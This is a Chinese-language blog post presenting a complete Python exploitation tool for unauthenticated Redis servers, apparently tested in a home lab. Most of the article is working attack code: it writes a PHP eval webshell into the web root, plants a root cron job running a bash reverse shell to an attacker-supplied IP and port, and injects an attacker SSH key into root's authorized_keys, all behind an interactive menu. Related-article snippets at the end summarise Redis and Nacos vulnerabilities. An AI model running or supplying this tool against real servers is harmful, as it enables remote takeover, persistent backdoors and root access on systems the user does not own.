python脚本实现Redis未授权访问漏洞利用

于 2024-10-07 11:41:20 发布
阅读量1.5k 收藏 7
点赞数 18
文章标签: python redis 数据库 反弹连接
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_60256199/article/details/142734212
版权

 之前介绍过Redis未授权访问漏洞,本文使用python实现Redis未授权访问检测以及对应三种getshell。

1 测试环境准备

CentOS 7(192.168.198.66/24):安装 Redis 服务器并用 root 权限开启服务,关闭保护模式;安装并开启 httpd 服务;开启 ssh 服务。

Kali(192.168.198.172/24):测试脚本效果,模拟攻击机。

Win10:VS Code开发脚本,Xshell控制虚拟机。

2 未授权访问检测

首先需要检测 6379 端口是否开启,直接使用 socket 连接测试即可,is_port_open() 函数实现检测端口开启情况。

def is_port_open(host,port):
    s=socket.socket()
    s.settimeout(0.3)
    try:
        s.connect((host,port))
    except Exception as e:
        return False
    else:
        return True
    finally:
        s.close()

 然后尝试连接 Redis 服务器,这里用到redis模块中的StrictRedis(host,port,socket_timeout),通过client_list() 方法获取客户列表查看是否连接成功。如果成功连接到 Redis 服务器, client_list() 的调用就不会抛出异常。

try:
    client = redis.StrictRedis(host=ip, port=port, socket_timeout=0.3)
    ok_lst = client.client_list()
    print('[+] Connected to the Redis server successfully...')
except Exception as e:
    print(f'[-] An unexpected error occurred: {e}')

3 写入webshell

Redis命令:

config set dir /var/www/html
config set dbfilename shell.php
set x "<?php @eval($_POST[123]); ?>"
save

对应的 redis 模块的方法:

client.config_set('dir','/var/www/html')
client.config_set('dbfilename','shell.php')
client.set('x','<?php @eval($_POST[123]); ?>')
client.save()

增加设置根目录一句话木马名称和密码功能:

def Webshell(client):
    try:
        df_dir='/var/www/html'
        web_dir=input('Please enter the root directory of the target machine\'s website, input nothing to use the default path: /var/www/html\n')
        web_dir=web_dir.strip()
        if not web_dir: web_dir=df_dir
        name=input('Please enter the name of the PHP file you want to upload: ')
        passwd=input('Please enter the connection password: ')
        client.config_set('dir',web_dir)
        client.config_set('dbfilename',name+'.php')
        client.set('x','<?php @eval($_POST['+passwd+']); ?>')
        client.save()
        print("[+] Webshell "+name+".php"+" uploaded successfully...")
    except Exception as e:
        print(f"[-] Webshell upload failed: {e}")

4 建立反弹连接

同理,这里利用定时任务实现反弹连接。先设置 Redis 数据库目录到系统定时任务目录,名字设置为 root (相当于修改 root 用户的定时任务),增加用户设定 IP 和端口监听功能。

def Reverse(client):
    try:
        client.config_set('dir','/var/spool/cron')
        client.config_set('dbfilename','root')
        ip=input('Set the attacker\'s IP address: ')
        port=input('Set the listening port: ')
        payload='\n* * * * * bash -i >& /dev/tcp/'+ip+'/'+port+' 0>&1\n'
        client.set('x',payload)
        client.save()
        print("[+] Reverse shell task created successfully...")
    except Exception as e:
        print(f"[-] Reverse shell creation failed: {e}")

5 SSH keys 免密登录

把 Redis 的目录设置为 /root/.ssh,保存文件为 authorized_keys,实现在靶机中 authorized_keys 写入攻击者 ssh 公钥。

def Ssh(client):
    try:
        sshkey=input('Enter the SSH key you have generated: ')
        client.config_set('dir','/root/.ssh')
        client.config_set('dbfilename','authorized_keys')
        client.set('x','\n\n'+sshkey+'\n\n')
        client.save()
        print("[+] SSH key injected successfully.")
    except Exception as e:
        print(f"[-] SSH key injection failed: {e}")

5 完整代码

import numpy as np
import socket
import redis
import sys
def Hello_FK_Redis():
    a,b=60,30
    x,y,r=30,15,13
    img=np.zeros((b,a),dtype=str)
    for i in range(b):
        for j in range(a):
            dist=np.sqrt((i-y)**2+(j-x)**2)
            if r-1<dist<r+1: img[i,j]='*'
            elif abs(j-x)<1 and dist<r: img[i,j]='|'
            elif abs(i-y)<1 and dist<r: img[i,j]='-'
    img[img=='']=' '
    for i in img: print(''.join(i))
    print('----Welcome to use Redis Vulnerability Exploitation Tool----')
def is_port_open(host,port):
    s=socket.socket()
    s.settimeout(0.3)
    try:
        s.connect((host,port))
    except Exception as e:
        return False
    else:
        return True
    finally:
        s.close()
def Webshell(client):
    try:
        df_dir='/var/www/html'
        web_dir=input('Please enter the root directory of the target machine\'s website, input nothing to use the default path: /var/www/html\n')
        web_dir=web_dir.strip()
        if not web_dir: web_dir=df_dir
        name=input('Please enter the name of the PHP file you want to upload: ')
        passwd=input('Please enter the connection password: ')
        client.config_set('dir',web_dir)
        client.config_set('dbfilename',name+'.php')
        client.set('x','<?php @eval($_POST['+passwd+']); ?>')
        client.save()
        print("[+] Webshell "+name+".php"+" uploaded successfully...")
    except Exception as e:
        print(f"[-] Webshell upload failed: {e}")

def Reverse(client):
    try:
        client.config_set('dir','/var/spool/cron')
        client.config_set('dbfilename','root')
        ip=input('Set the attacker\'s IP address: ')
        port=input('Set the listening port: ')
        ip=ip.strip()
        port=port.strip()
        payload='\n* * * * * bash -i >& /dev/tcp/'+ip+'/'+port+' 0>&1\n'
        client.set('x',payload)
        client.save()
        print("[+] Reverse shell task created successfully...")
    except Exception as e:
        print(f"[-] Reverse shell creation failed: {e}")
def Ssh(client):
    try:
        sshkey=input('Enter the SSH key you have generated: ')
        client.config_set('dir','/root/.ssh')
        client.config_set('dbfilename','authorized_keys')
        client.set('x','\n\n'+sshkey+'\n\n')
        client.save()
        print("[+] SSH key injected successfully.")
    except Exception as e:
        print(f"[-] SSH key injection failed: {e}")
if __name__ == '__main__':
    Hello_FK_Redis()
    ip=input('Please enter the target machine\'s IP address: ')
    port=6379
    if is_port_open(ip,port):
        print('[+] Port 6379 is open...')
        print('[*] Trying to connect Redis server...')
        try:
            client=redis.StrictRedis(host=ip,port=port,socket_timeout=0.3)
            ok_lst=client.client_list()
            print('[+] Connected to the Redis server successfully...')
            print('Please choose the exploit method you want to use:\nEnter 1 for webshell\nEnter 2 for establishing a reverse connection\nEnter 3 for SSH key-based authentication\nOr any other character to exit...')
            try:
                c=int(input())
                if c==1: Webshell(client)
                elif c==2: Reverse(client)
                elif c==3: Ssh(client)
                else: 
                    print('[*] Exiting...')
                    sys.exit()
            except Exception:
                print('[*] Exiting...')
                sys.exit()
        except Exception as e:
            print(f'[-] An unexpected error occurred: {e}')

    else:
        print('[-] Port 6379 is not open...')

6 测试效果

webshell

 

反弹连接

监听端口:7777

 下面输入攻击机端口保证与监听的攻击机和端口一致:

 

 免密登录

在 kali 中 .ssh 复制公钥 id_rsa.pub 的内容

 免密登录:

2,4(1H,3H)-PD are mine
关注
redis授权访问检测脚本.py
02-11
python编写的redis授权访问漏洞检测脚本
Redis授权访问漏洞详解
白泽Sec安全实验室
12-03 1407
一、Redis是啥 Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。从2010年3月15日起,Redis的开发工作由VMware主持。从2013年5月开始,Redis的开发由Pivotal赞助。 二、漏洞危害 Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,这样将会将 Redis 服务暴露到公网上。会导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Re
Nacos 存在认证绕过漏洞(CVE-2021-29441)
北方的孤夜
06-04 1999
Nacos 存在认证绕过漏洞(CVE-2021-29441)
针对Nacos漏洞猎杀的各种骚姿势
最新发布
2301_80115097的博客
08-14 1355
这次给师傅们分析的是Nacos相关漏洞挖掘的骚技巧,主要是给师傅们打下nday,让师傅们能够从零基础的小白也可以上手打Nacos的nday(主要给小白看的,大佬勿喷)。然后下面主要介绍了NacosExploitGUI自动化工具的使用,以及使用这个工具打nday的手法,以及要是批量漏洞url怎么扫描利用,总的来讲,下面的漏洞案例复现还是蛮详细的。
nacos授权-CVE-2021-29441复现
crowsec
07-21 7928
Nacos 是阿里巴巴推出来的一个新开源项目,是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集,可以快速实现动态服务发现、服务配置、服务元数据及流量管理。 该漏洞发生在nacos在进行认证授权操作时,会判断请求的user-agent是否为”Nacos-Server”,如果是的话则不进行任何认证。开发者原意是用来处理一些服务端对服务端的请求。但是由于配置的过于简单。。。...
redis 授权访问漏洞
weixin_60719780的博客
03-02 2165
Redis默认情况下,会绑定在0.0.0.0:6379(在redis3.2之后,redis增加了protected-mode,在这个模式下,非绑定IP或者没有配置密码访问时都会报错),如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源ip访问等等,这样将会将Redis服务暴露在公网上,如果在没有设置密码认证(默认为空)的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问Redis以及读取Redis的数据。(2) 没有设置密码认证(默认为空)或者弱密码,可以免密码登录redis服务。
Nacos漏洞总结复现
heike_Ch的博客
04-23 1452
Nacos中发现影响Nacos <= 2.1.0的问题,Nacos用户使用默认JWT密钥导致授权访问漏洞。通过该漏洞,攻击者可以绕过用户名密码认证,直接登录Nacos用户。
Python-通过Redis和CSRF获取RCE的一个示例
08-10
1. **利用授权访问**:攻击者首先尝试连接受保护的Redis服务器,如果成功,可以执行任意Redis命令。 2. **命令注入**:攻击者在Redis中注入恶意命令,例如设置一个可执行的脚本作为键值对,然后通过Web应用...
redis_lua_exploit
05-11
在"redis_lua_exploit-master"这个压缩包中,可能包含了相关的Python脚本示例,用于演示或测试Redis Lua漏洞利用的过程。通过研究这些脚本,我们可以深入理解攻击的原理,提高系统的安全性。同时,这些资源也可以...
redis-rce:Redis RCE 的几种方法
04-15
一、授权访问 Redis 默认情况下监听在本地主机上,但如果配置错误,将其暴露在公网,攻击者可以通过网络连接Redis 服务器。例如,通过 TCP 监听所有接口(bind 0.0.0.0)且设置密码认证,攻击者可以轻易地...
redis桌面客户端redis-desktop-client-master.zip
05-01
- **安全考虑**:为Redis设置访问控制,避免暴露在公网,防止授权访问。 - **版本更新**:定期检查Redis Desktop Client的更新,以获取最新的功能和修复的安全漏洞。 5. **进阶使用**: - **Lua脚本支持**:...
【网络安全】Redis授权访问查看敏感文件
你在看屏幕的同时,屏幕也在注视着你
12-21 1634
redis服务查看敏感文件
Nacos权限绕过漏洞(CVE-2021-29441)复现
大大怪将军,你来啦!
04-14 4082
CVE-2021-29441 是 Nacos 组件中的一个权限验证漏洞,该漏洞允许授权的攻击者绕过认证,进而获取服务器的敏感信息或执行授权操作。把请求头中GET请求改成POST,User-Agent中的参数换成Nacos-Server,然后我添加了一个用户nbacba,密码一样。我们可以看见有一个叫nacos的用户,密码通过盐加密方法加密(nacos的初始用户名和密码都为nacos,有时候可以碰碰运气)升级 Nacos 到安全版本:Nacos 官方已发布修复此漏洞的版本。返回值为200,可以正常访问
【漏洞复现】Redis授权
过期的秋刀鱼
11-05 261
由于Redis存在授权访问漏洞,所以无需账号密码就可以在我们的Redis目录下去远程控制靶机的Redis数据库,但是我们希望不仅仅是可以操作对方的Redis数据库,想提权去控制服务器,比较容易想到的就是想办法写个反弹shell,让靶机来连接我们,如果可以成功反弹,我们就可以提权。但是写计划任务是需要在计划任务的目录。4、使用Redis的set命令,往持久化目录文件里写一个键值对(这是set命令的格式要求,必须写键值对),键随便起,我起的是saury,值就为反弹shell的命令。
Python武器库开发-武器库篇之Redis授权漏洞一键Getshell(五十八)
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
06-17 968
Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进⾏采⽤相关的策略,⽐如添加防⽕墙规则避免其他⾮信任来源 ip 访问等,这样将会将 Redis 服务暴露到公⽹上,如果在没有设置密码认证(⼀般为空)的情况下,会导致任意⽤户在可以访问⽬标服务器的情况下授权访问 Redis 以及读取Redis 的数据。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值